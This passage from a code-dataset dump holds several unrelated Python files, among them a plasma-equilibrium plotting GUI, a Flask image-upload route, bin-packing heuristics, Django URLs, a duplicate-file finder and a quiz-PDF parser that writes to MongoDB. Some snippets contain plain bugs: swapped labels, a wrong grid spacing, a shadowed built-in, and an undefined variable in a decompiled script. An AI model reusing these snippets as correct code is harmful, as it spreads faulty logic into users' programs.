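    z = zc @ cos_mt + zs @ sin_mt
    return r, z

# A circle of radius 0.5 centred at R=1.65, z=0:
r, z = moments_to_surface(np.array([1.65, 0.5]), np.zeros(2),
                          np.zeros(2), np.array([0.0, 0.5]))
assert np.allclose(r, 1.65 + 0.5 * np.cos(np.linspace(0, 2 * np.pi, 101)))
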
self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n self.jt += 1\n self.jt = self.jt%self.nt\n self.update_plot()\n\n def Backward(self):\n self.stop = True\n self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n self.jt -= 1\n self.jt = self.jt%self.nt\n self.update_plot()\n\n def Play(self):\n self.stop = False\n self.play_button['image'] = self.pausefig\n self.play_button['command'] = self.Pause\n while self.jt < self.nt-1 and not self.stop:\n self.jt += 1\n self.update_plot()\n self.pol_canvas.start_event_loop(self.timeout)\n\n\n def set_plots(self):\n\n# Scale bar\n\n self.crntsc = tk.Scale(self.toolframe, command=self.jump, \\\n orient=tk.HORIZONTAL, length=300)\n self.crntsc.pack(side=tk.LEFT)\n\n# Poloidal plot\n\n self.tim0 = self.pol_fig.text(.5, .96, '', ha='center', va='top')\n\n self.scat = self.pol_fig.add_subplot(111, aspect='equal')\n self.scat.set_xlim((0.8, 3.0))\n self.scat.set_ylim((-1.4, 1.4))\n self.scat.set_xlabel('R [m]')\n self.scat.set_ylabel('z [m]')\n gc_r, gc_z = map_equ_20180130.get_gc()\n for key in gc_r.keys():\n self.scat.plot(gc_r[key], gc_z[key], 'b-')\n\n self.rhoplot = {}\n self.theplot = {}\n self.theplot2 = {}\n nt, n_rho_u, n_the_u = self.rsurf.shape\n for jrho in range(n_rho_u):\n self.theplot[jrho], = self.scat.plot([], [], 'g-')\n self.theplot2[jrho], = self.scat.plot([], [], 'g-')\n for jthe in range(n_the_u):\n self.rhoplot[jthe], = self.scat.plot([], [], 'r-')\n\n# Moments\n\n self.tim1 = self.mom_fig.text(.5, .96, '', ha='center', va='top')\n mom_type = len(momtyp)\n\n ncols = self.mom_order\n nrows = mom_type\n\n self.rcp = {}\n self.rsp = {}\n self.zcp = {}\n self.zsp = {}\n\n for jm in range(self.mom_order):\n jplot = jm + 1\n xtext = 0.1 + (float(jm)*0.94)/float(self.mom_order)\n self.mom_fig.text(xtext, 0.93, '%dth moment' %jm, ha='center', va='top')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot)\n momp.set_xlabel(r'$\\rho_{tor}$')\n\n self.rcp[jm], = momp.plot(self.rho_u, self.rc[0, :, jm])\n if jm == 0:\n momp.set_ylabel('R cos')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + self.mom_order)\n self.rsp[jm], = momp.plot(self.rho_u, self.rs[0, :, jm])\n if jm == 0:\n momp.set_ylabel('R sin')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + 2*self.mom_order)\n self.zcp[jm], = momp.plot(self.rho_u, self.zc[0, :, jm])\n if jm == 0:\n momp.set_ylabel('z cos')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + 3*self.mom_order)\n self.zsp[jm], = momp.plot(self.rho_u, self.zs[0, :, jm])\n if jm == 0:\n momp.set_ylabel('z sin')\n \n# Profiles\n\n self.tim2 = self.proffig.text(.5, .97, '', ha='center', va='top')\n self.qplot, = self.qsub.plot( self.rho_u, self.q_u[:, 0])\n self.pplot, = self.psub.plot( self.rho_u, self.pres_u[:, 0])\n self.rbplot, = self.rbsub.plot(self.rho_u, self.rbphi_u[:, 0])\n\n# Update\n\n self.update_plot()\n\n\n def jump(self, arg):\n\n self.jt = int(float(arg)/100. 
* (self.nt-1))\n self.update_plot(reset=False)\n\n\n def update_plot(self, reset=True):\n\n if reset:\n self.crntsc.set(float(self.jt)/(self.nt - 1)*100.)\n# return\n tstr = '# %d, Time:%6.3f s' %(self.nshot, self.tarr[self.jt])\n\n if self.jtab == 0: # Poloidal\n nt, n_rho_u, n_the_u = self.rsurf.shape\n for jrho in range(n_rho_u):\n self.theplot[jrho].set_data(self.rsurf[self.jt, jrho, :], self.zsurf[self.jt, jrho, :])\n self.theplot2[jrho].set_data(self.rsurf[self.jt, jrho, [-1, 0]], self.zsurf[self.jt, jrho, [-1, 0]])\n for jthe in range(n_the_u):\n self.rhoplot[jthe].set_data(self.rsurf[self.jt, :, jthe], self.zsurf[self.jt, :, jthe])\n self.tim0.set_text(tstr)\n self.pol_canvas.draw()\n\n elif self.jtab == 1: # Moments\n\n for jm in range(self.mom_order):\n self.rcp[jm].set_ydata(self.rc[self.jt][:, jm])\n self.rsp[jm].set_ydata(self.rs[self.jt][:, jm])\n self.zcp[jm].set_ydata(self.zc[self.jt][:, jm])\n self.zsp[jm].set_ydata(self.zs[self.jt][:, jm])\n self.tim1.set_text(tstr)\n self.mom_canvas.draw()\n\n elif self.jtab == 2: # Profiles\n self.qsub.set_ylim((0, 1.1*np.max(self.q_u[:, self.jt])))\n self.qplot.set_ydata(self.q_u[:, self.jt])\n\n self.psub.set_ylim((0, 1.1*np.max(self.pres_u[:, self.jt])))\n self.pplot.set_ydata(self.pres_u[:, self.jt])\n\n self.rbsub.set_ylim((0, 1.1*np.max(self.rbphi_u[:, self.jt])))\n self.rbplot.set_ydata(self.rbphi_u[:, self.jt])\n\n self.tim2.set_text(tstr)\n self.profcanvas.draw()\n\n\n\nif __name__ == \"__main__\":\n\n nshot = 28053\n GEO_NEMEC(nshot)\n","sub_path":"geo_nemec_test.py","file_name":"geo_nemec_test.py","file_ext":"py","file_size_in_byte":19033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"414876004","text":"from flask import request, send_from_directory\nfrom werkzeug import secure_filename\nfrom sleepypuppy import app, csrf_protect\nimport os\nfrom PIL import Image\n\n# Only allow png extensions, which is the filetype we generate using HTML5 canvas.\nALLOWED_EXTENSIONS = set(['png'])\n\ndef allowed_file(filename):\n \"\"\"\n Method to filter out bad filenames and prevent dir traversal.\n \"\"\"\n return '.' 
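
# The upload handler in this record pairs werkzeug's secure_filename with a PIL
# thumbnail pass. The image part alone, writing a small preview next to a source
# file; paths here are placeholders. The record spells the resampling filter
# Image.ANTIALIAS, which newer Pillow releases rename to Image.LANCZOS.

from PIL import Image

def make_thumbnail(src, dst, size=(256, 256)):
    im = Image.open(src)
    im.thumbnail(size, Image.ANTIALIAS)   # shrinks in place, keeps aspect ratio
    im.save(dst, "PNG")

# make_thumbnail("shot.png", "small_shot.png")   # placeholder file names
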
in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@csrf_protect.exempt\n@app.route('/up', methods=['GET', 'POST'])\ndef upload_file():\n \"\"\"\n Store filename by timestamp and resize file for thumbnail.\n \"\"\"\n size = 256, 256\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n # Prevent dir traversal/NUL byte injection\n filename = secure_filename(file.filename)\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n im = Image.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n im.thumbnail(size, Image.ANTIALIAS)\n im.save(app.config['UPLOAD_FOLDER'] + '/small_' + filename, \"PNG\")\n return \"\"\n\n@app.route('/up/')\ndef uploaded_file(filename):\n \"\"\"\n Route to retrieve screenshot when requested.\n \"\"\"\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n","sub_path":"sleepypuppy/upload/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"41994371","text":"from containerSuit import ContainerSuit as CS\nfrom size import ContainerSize \nimport math\n\nclass AlgorithmsImpl: \n def __init__(self, capacity = 100): \n self.containerCapacity = capacity \n\n def theoreticalContainers(self, cargosSizes):\n return math.ceil(self.getCargosSum(cargosSizes) / self.containerCapacity) \n\n @staticmethod \n def getCargosSum(cargosSizes): \n return sum(cargosSizes) \n\n def NFA(self, sizes, sort = False, reverse = False): # NFA \n if not sort: \n label = 'NFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else:\n if reverse:\n label = 'NFA(sorted in reverse)'\n else:\n label = 'NFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n\n def FFA(self, sizes, sort = False, reverse = False): # FFA \n if not sort: \n label = 'FFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else: \n if reverse:\n label = 'FFA(sorted in reverse)'\n else:\n label = 'FFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n iter += 1 \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n answer = containers.getFirstSuitable(cargo) \n if answer: \n firstSuitable = answer['container'] \n iter += answer['iter'] \n firstSuitable.addCargo(cargo) \n else: \n iter += len(containers.suit); \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter) \n\n def WFA(self, sizes, sort = False, reverse = False): # WFA \n if not sort: \n label = 'WFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else:\n if reverse:\n label = 'WFA(sorted in reverse)'\n else:\n label = 'WFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n iter += 1 \n if 
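
# This record implements next-fit, first-fit, worst-fit and best-fit bin packing
# over container objects. The core first-fit-decreasing heuristic, reduced to a
# plain list of remaining capacities, is a compact sketch (names are mine):

def first_fit_decreasing(sizes, capacity):
    """Pack item sizes into the bins a first-fit-decreasing pass finds."""
    bins = []                            # remaining free space per bin
    for s in sorted(sizes, reverse=True):
        for i, free in enumerate(bins):
            if free >= s:
                bins[i] -= s
                break
        else:                            # no existing bin fits: open a new one
            bins.append(capacity - s)
    return len(bins)

assert first_fit_decreasing([70, 60, 50, 30, 20, 10], 100) == 3   # 70+30, 60+20+10, 50
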
lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n tempDict = containers.getMostEmpty() \n mostEmpty = tempDict['container'] \n iter += tempDict['iter'] + 1 \n if mostEmpty.FreeSpace() >= cargo.size: \n mostEmpty.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter)\n\n def BFA(self, sizes, sort = False, reverse = False): # BFA \n if not sort: \n label = 'BFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else: \n if reverse:\n label = 'BFA(sorted)'\n else:\n label = 'BFA(sorted in reverse)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n iter += 1 \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n tempDict = containers.getMostFullAndSuitable(cargo) \n if tempDict: \n mostFullSuitable = tempDict['container'] \n iter += tempDict['iter'] + 1 \n if mostFullSuitable.FreeSpace() >= cargo.size: \n mostFullSuitable.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n else: \n iter += len(containers.suit) \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter) \n\n def CargoListFromSizes(self, sizes, sort = False, reverse = False):\n if sort: \n sizes = sorted(sizes, reverse=reverse) \n cargos = []\n for size in sizes: \n newCargo = ContainerSize(size) \n cargos.append(newCargo) \n return cargos \n\n @staticmethod \n def printContainersInfo(suit, label = ''): \n toPrint ='--------------------------' + '\\n' + label + '\\n' + '--------------------------' + '\\n' \n for container in suit: \n string = 'Container size = ' + str(container.getCargoWeight()) + '( ' \n for cargo in container.cargos: \n string += str(cargo.size) + ' + ' \n toPrint += string[0:-2] + ')\\n' \n toPrint += 'Containers required: ' + str(len(suit)) \n print(toPrint) ","sub_path":"Lab_2/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"396534542","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/4\n# @Author : hay\nfrom django.conf.urls import url\nfrom sendblaster.views import platform, campaign, mailings, campaignclassify\napp_name = 'sendblaster'\n\nurlpatterns = [\n url(r'^platform$', platform.PlatformViews.as_view(), name='platform'),\n url(r'^campaign$', campaign.CampaignViews.as_view(), name='campaign'),\n url(r'^mailing$', mailings.CampaignViews.as_view(), name='mailing'),\n url(r'^mailing-upload$', mailings.CampaignUploadViews.as_view(), name='mailing-upload'),\n url(r'^mailing-statssummary$', mailings.MailingStatsSummary.as_view(), name='mailing-statssummary'),\n url(r'^campaignclassify$', campaignclassify.CampaignClassifyViews.as_view(), name='campaignclassify'),\n]","sub_path":"sendblaster/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"110283341","text":"import numpy as np\n\nclass PadeOpsPlanes:\n def __init__(self, basedir, RunID, nx, ny, nz, Lx, Ly, Lz, xst, xen, yst, yen, zst, zen):\n self.basedir = basedir\n self.xst = xst\n self.yst = yst\n self.xen = xen\n self.yen = yen\n self.zst = zst\n self.zen = zen\n self.Lx = Lx\n self.Ly = Ly\n self.Lz = Lz\n self.nx = 
nx\n self.ny = ny\n self.nz = nz\n self.dx = Lx/nx\n self.dy = Ly/ny\n self.dz = Lz/ny\n \n self.RunID = RunID\n self.x = np.arange(0.,self.Lx,self.dx)\n self.y = np.arange(0.,self.Ly,self.dy)\n self.z = np.arange(0.,self.Lz,self.dz)\n\n def read_xy_plane(self, tidx, zid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_z'+ '{:05d}'.format(zid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.nx,self.ny),order='F')\n field = tmp[self.xst:self.xen,self.yst:self.yen] \n return field\n\n def read_xz_plane(self, tidx, yid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_y'+ '{:05d}'.format(yid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.nx,self.nz),order='F')\n field = tmp[self.xst:self.xen,self.zst:self.zen] \n return field\n \n def read_yz_plane(self, tidx, xid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_x'+ '{:05d}'.format(xid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.ny,self.nz),order='F')\n field = tmp[self.yst:self.yen,self.zst:self.zen] \n return field\n","sub_path":"src/PadeOpsPlanes.py","file_name":"PadeOpsPlanes.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"111386537","text":"import os\nimport argparse\n\n\ndef get_all_files(dir):\n path_f = []\n for dirs, subdirs, files in os.walk(dir):\n for f in files:\n path = os.path.join(dirs, f)\n path_f.append(path)\n return sorted(path_f, key=lambda file: os.path.basename(file))\n\n\ndef are_files_duplicates(file1, file2):\n return os.path.basename(file1) == os.path.basename(file2) and os.path.getsize(file1) == os.path.getsize(file2)\n\n\ndef is_dir_exist(dir):\n return os.path.exists(dir)\n\n\ndef find_duplicates(dir):\n duplicates = []\n path_f = get_all_files(dir)\n for current_file, next_file in zip(path_f, path_f[1:]):\n if are_files_duplicates(current_file, next_file):\n duplicates.append((current_file, next_file))\n return duplicates\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dirpath\", type=str, help=\"Path to cheking dir\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n if is_dir_exist(arg_parser().dirpath):\n duplicates = find_duplicates(arg_parser().dirpath)\n if duplicates:\n print(\"\\n\".join(\"{} дублируется с {}\".format(duplicate[0], duplicate[1]) for duplicate in duplicates))\n else:\n print(\"Дубликатов нет\")\n else:\n print(\"Такой директории не существует\")\n","sub_path":"duplicates.py","file_name":"duplicates.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"555241459","text":"\nfrom Peeves.TestUtils import *\nfrom unittest import TestCase\nfrom McUtils.CPotentialLib import *\nimport numpy as np\n\nclass RynDMCTests(TestCase):\n\n @validationTest\n def load_cap(self):\n import sys\n sys.path.insert(0, TestManager.test_data_dir)\n import constantPot as cp\n return cp.potential\n\n @validationTest\n def test_loadPot(self):\n self.assertEquals(type(self.load_cap()).__name__, \"PyCapsule\")\n\n @validationTest\n def test_CPot(self):\n walker = np.array([\n [0.9578400,0.0000000,0.0000000],\n [-0.2399535,0.9272970,0.0000000],\n 
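
# The read_*_plane methods in the PadeOpsPlanes record above all follow one
# pattern: read raw float64 data with np.fromfile, reshape it Fortran-ordered,
# then slice a window. The pattern in isolation, against a throwaway file:

import numpy as np

nx, ny = 8, 6
fname = "plane.dat"                       # throwaway file in the working directory
np.arange(nx * ny, dtype=np.float64).tofile(fname)
plane = np.fromfile(fname, dtype=np.float64).reshape((nx, ny), order="F")
window = plane[2:6, 1:5]                  # the xst:xen, yst:yen crop
assert window.shape == (4, 4)
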
[0.0000000,0.0000000,0.0000000]\n ])\n self.assertEquals(\n CPotential(self.load_cap())([\"H\", \"H\", \"O\"], walker),\n 52.0\n )","sub_path":"Tests/RynDMCTests.py","file_name":"RynDMCTests.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"18755121","text":"def insertion_sort(x) :\n for i in range(1, len(x)) :\n key = x[i]\n j = i-1\n while j>=0 and x[j] > key:\n x[j+1] = x[j]\n j -= 1\n x[j+1] = key\n\ny = []\nlen = int(input())\nfor _ in range(len) : y.append(int(input()))\ninsertion_sort(y)\nfor i in y : print(i)\n","sub_path":"insertionsort_typeerror.py","file_name":"insertionsort_typeerror.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"552785774","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\SimpleMathCalc\\square.py\n# Compiled at: 2019-04-02 12:15:16\n# Size of source mod 2**32: 587 bytes\n\n\ndef function():\n number1 = eval(input('Enter the number of squares opened: '))\n number2 = eval(input('Enter the number of squares: '))\n n = 1\n if number1 == 0:\n if number2 == 0:\n sum = 'input error'\n return sum\n elif number2 % 2 == 0 and m == n / number2:\n if number1 < 0:\n sum = 'input error'\n return sum\n sum = pow(number1, m)\n return sum\n else:\n m = n / number2\n sum = pow(number1, m)\n return sum\n\n\nwhile True:\n print(function())","sub_path":"pycfiles/SimpleMathCalc-0.1-py3.7/square.cpython-37.py","file_name":"square.cpython-37.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"603407150","text":"from xml.dom import minidom\nimport re\nimport simplejson\nimport pymongo\nfrom pymongo import MongoClient\n\nclient = MongoClient('mongodb://user:pass@ds153958.mlab.com:53958/qb-questions')\n\nxmldoc = minidom.parse('output.xml') #get the correct xml file\nboxes = xmldoc.getElementsByTagName('textbox') #find every single textbox. Many of these contain a question each.\nanswerlist = [] #list of list of answers. index i corresponds to a list of answers for question i.\nquestionlist = []\nfor b in boxes:\n\tanswerState = False\n\tanswers = [] #init list for this question's answers\n\tif (b.firstChild and b.getElementsByTagName('text')[0].firstChild.nodeValue == \"(\"): #if this is a question. Note that the character of choice is the (\n\t\tquestion = b.getElementsByTagName('text') #get all text elements in this question. 
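
# This record walks a pdf2xml-style document with xml.dom.minidom, reading one
# character per <text> node and checking its font size attribute. The traversal
# pattern on a tiny in-memory document (an illustrative sketch, not the record's
# input format):

from xml.dom import minidom

doc = minidom.parseString("<textbox><text size='15'>A</text><text>B</text></textbox>")
for node in doc.getElementsByTagName("text"):
    letter = node.firstChild.nodeValue
    size = node.attributes["size"].value if "size" in node.attributes.keys() else None
    print(letter, size)   # -> A 15, then B None
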
question is a list of textelements, each of which contain a letter.\n\t\tanswer = []\n\t\tqtext = []\n\t\tfor i in range(len(question)):\n\t\t\tletter = question[i].firstChild.nodeValue #get the letter\n\t\t\tif (letter == \"\\n\"):\n\t\t\t\tqtext.append(\" \")\n\t\t\telse:\n\t\t\t\tqtext.append(letter)\n\t\t\tif 'size' in list(question[i].attributes.keys()):\n\t\t\t\tsize = question[i].attributes['size'].value #get the size of this\n\t\t\tif (\"\".join([s.firstChild.nodeValue for s in question[i-6:i]]) == \"ANSWER\"): #check if we're at the answer part of this question\n\t\t\t\tanswerState = True\n\t\t\tif (answerState and float(size) > 14): #if bolded and we're at the answer (remember, there are powers)\n\t\t\t\tanswer.append(letter)\n\t\t\tif (not ('size' in list(question[i].attributes.keys())) and answerState and i < len(question)-1): #if it's a space, we're in the answer section, and not at the end\n\t\t\t\tif ('size' in list(question[i+1].attributes.keys()) and float(question[i+1].attributes['size'].value) < 14 and len(answer) > 0): #check if the next char is bolded\n\t\t\t\t\tif (answer[-1] == \" \" or answer[-2:] == \"\\n\"):\n\t\t\t\t\t\tanswer.pop()\n\t\t\t\t\tanswers.append(\"\".join(answer)) #if it isn't bolded, we know we're at the end of one answer (continue to the next possible answer, so reset.)\n\t\t\t\t\tanswer = []\n\t\t\t\t\n\t\tif (len(answer) > 0):\n\t\t\tif (answer[-1] == \" \" or answer[-1] == \"\\n\"):\n\t\t\t\tanswer.pop()\n\t\t\tanswers.append(\"\".join(answer)) #catch the last answer\n\t\tanswerlist.append(answers)\n\t\tquestionlist.append(\"\".join(qtext).split(\"ANSWER\")[0]) #get the question part of the text\n\nfinal = \"{\\\"packet\\\": [\\n\"\n\nfor i in range(len(questionlist)):\n\tquestion = questionlist[i].replace(\"\\\"\", \"\\\\\" + \"\\\"\") #format question\n\tanswer = []\n\tfor a in answerlist[i]:\n\t\tanswer.append(\"\\\"\" + re.sub(r'\\([^)]*\\)', '', a.replace(\"\\\"\", \"\\\\\" + \"\\\"\")) + \"\\\"\") #format answer\n\tif answer != []:\n\t\tfinal += \"{\\\"question\\\": \" + \"\\\"\" + question + \"\\\", \\\"answer\\\": \" + \"[\" + \", \".join(answer) + \"]\" + \"},\" + \"\\n\" #format into json\n\n# Get the sampleDB database\ndb = client.get_default_database()\nqs = db.questions\n\nfinal = final[:-2]\n\nfinal += \"\\n\"\n\nfinal += \"]}\"\n\nprint(final)\n\n#j = json.loads(final)\n\n#\nj = simplejson.loads(final)\n\nprint(j)\nprint(\"------------------------------------------------------\")\nqs.insert(j)\n\n\n\n\n\n\n","sub_path":"parse/parse_old.py","file_name":"parse_old.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"6836916","text":"# -*-T coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 02:08:58 2019\n\n@author: iceblaze\n\"\"\"\n\n#load the csv file using read_csv function of pandas library\nfrom sklearn.model_selection import LeaveOneOut\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\n\n#load a csv file using pandas\ndata = pd.read_csv( \"Train_v2.csv\")\n\n#assinging dependent variable \nY = data.iloc[:,3].values\n# assinging independent varible\nX = data.drop(columns=['bank_account','uniqueid', 'household_size','age_of_respondent' ]).astype(str)\n#seperating the non-categorical features\nz = data.iloc[:,[6,7]]\nlabelencoder_x = LabelEncoder()\nX = 
X.apply(lambda col: labelencoder_x.fit_transform(col))\nonehotencoder = OneHotEncoder()\nX = onehotencoder.fit_transform(X).toarray()\n\nlabelencoder_y = LabelEncoder()\nY = labelencoder_y.fit_transform(Y)\n\n\n#avoiding the dummy variable trap\nX = X[:,1:]\nX = pd.DataFrame(data=X)\nX = X.join(z).values\n\n\n\nnum_folds = 10\nseed = 7\n\nloocv = LeaveOneOut ()\nmodel = LogisticRegression(solver='liblinear')\n\nresults = cross_val_score(model, X, Y, cv=loocv)\nprint(\"Accuracy: %.3f%% (%.3f%%) \" % (results.mean()*100.0, results.std()*100.0))","sub_path":"evaluation__leave_one_out_cross validation.py","file_name":"evaluation__leave_one_out_cross validation.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"524127318","text":"# 460. Find K Closest Elements\n# Description\n# Given a target number, a non-negative integer k and an integer array A sorted in ascending order, find the k closest numbers to target in A, sorted in ascending order by the difference between the number and target. Otherwise, sorted in ascending order by number if the difference is same.\n#\n# The value k is a non-negative integer and will always be smaller than the length of the sorted array.\n# Length of the given array is positive and will not exceed 10^4\n# Absolute value of elements in the array and x will not exceed 10^4\n# Have you met this question in a real interview?\n# Example\n# Given A = [1, 2, 3], target = 2 and k = 3, return [2, 1, 3].\n#\n# Given A = [1, 4, 6, 8], target = 3 and k = 3, return [4, 1, 6].\n#\n# Challenge\n# O(logn + k) time complexity.\n\n\nclass Solution:\n\t\"\"\"\n\t@param A: an integer array\n\t@param target: An integer\n\t@param k: An integer\n\t@return: an integer array\n\t\"\"\"\n\t\n\tdef kClosestNumbers (self, A, target, k):\n\t\t# write your code here\n\t\t# k cloest, since it is ordered, we can first find closest use binary search (O(log(n))), then check left side and right side, use two pointers. 
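
# This record implements the O(log n + k) binary-search plus two-pointer
# solution it describes. For reference, the simple O(n log n) version it
# improves on is a one-liner: sort by (distance to target, value), which also
# encodes the smaller-number-wins tie-break.

def k_closest_simple(A, target, k):
    return sorted(A, key=lambda v: (abs(v - target), v))[:k]

assert k_closest_simple([1, 2, 3], 2, 3) == [2, 1, 3]
assert k_closest_simple([1, 4, 6, 8], 3, 3) == [4, 1, 6]
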
So binary search + two pointers O(log(n)+k)\n\t\t\n\t\tif A is None or len (A) == 0 or k is None or target is None or k <= 0:\n\t\t\treturn []\n\t\t\n\t\tif len (A) <= k:\n\t\t\t# we can not directly return A, we need to update k = len(A), only need to find len(A) cloest, also need to return result in the order that closest to target, not original order\n\t\t\tk = len (A)\n\t\t\n\t\tstart = 0\n\t\tend = len (A) - 1\n\t\tmid = start + (end - start) // 2\n\t\twhile start + 1 < end:\n\t\t\tmid = start + (end - start) // 2\n\t\t\tif A [mid] > target:\n\t\t\t\tend = mid\n\t\t\telif A [mid] < target:\n\t\t\t\tstart = mid\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t\t# either A[mid] == target, or start == end or start == end - 1\n\t\t\n\t\tif A [mid] == target:\n\t\t\tclosest = mid\n\t\telif start == end - 1:\n\t\t\t# closest in start and end\n\t\t\tif abs (target - A [start]) <= abs (target - A [end]):\n\t\t\t\tclosest = start\n\t\t\telse:\n\t\t\t\tclosest = end\n\t\t\n\t\tp1 = closest - 1\n\t\tp2 = closest + 1\n\t\t# two pointers\n\t\t\n\t\tif k == 1:\n\t\t\treturn A [closest]\n\t\t\n\t\tcount = 1\n\t\tresult = [A [closest]]\n\t\t# we need to find total k\n\t\twhile count < k:\n\t\t\t# find candidate\n\t\t\tif p1 >= 0 and p2 < len (A):\n\t\t\t\t# we have two candidate\n\t\t\t\tif target - A [p1] <= A [p2] - target:\n\t\t\t\t\tresult.append (A [p1])\n\t\t\t\t\tp1 -= 1\n\t\t\t\telse:\n\t\t\t\t\tresult.append (A [p2])\n\t\t\t\t\tp2 += 1\n\t\t\telif p1 < 0:\n\t\t\t\tresult.append (A [p2])\n\t\t\t\tp2 += 1\n\t\t\telse:\n\t\t\t\tresult.append (A [p1])\n\t\t\t\tp1 -= 1\n\t\t\t\n\t\t\tcount += 1\n\t\t\n\t\treturn result\n\n\nassert Solution().kClosestNumbers([1,2,3],2,3) == [2,1,3]\n\nassert Solution().kClosestNumbers([1,4,6,8],3,3) == [4,1,6]","sub_path":"Algorithm/Python/Array/FindKCloestElements.py","file_name":"FindKCloestElements.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"181598759","text":"#!/usr/bin/env python2.7\n# coding=utf-8\n\"\"\"\nSopel - An IRC Bot\nCopyright 2008, Sean B. Palmer, inamidst.com\nCopyright © 2012-2014, Elad Alfassa \nLicensed under the Eiffel Forum License 2.\n\nhttp://sopel.chat\n\"\"\"\nfrom __future__ import unicode_literals, absolute_import, print_function, division\n\nimport sys\nfrom sopel.tools import stderr\n\nif sys.version_info < (2, 7):\n stderr('Error: Requires Python 2.7 or later. 
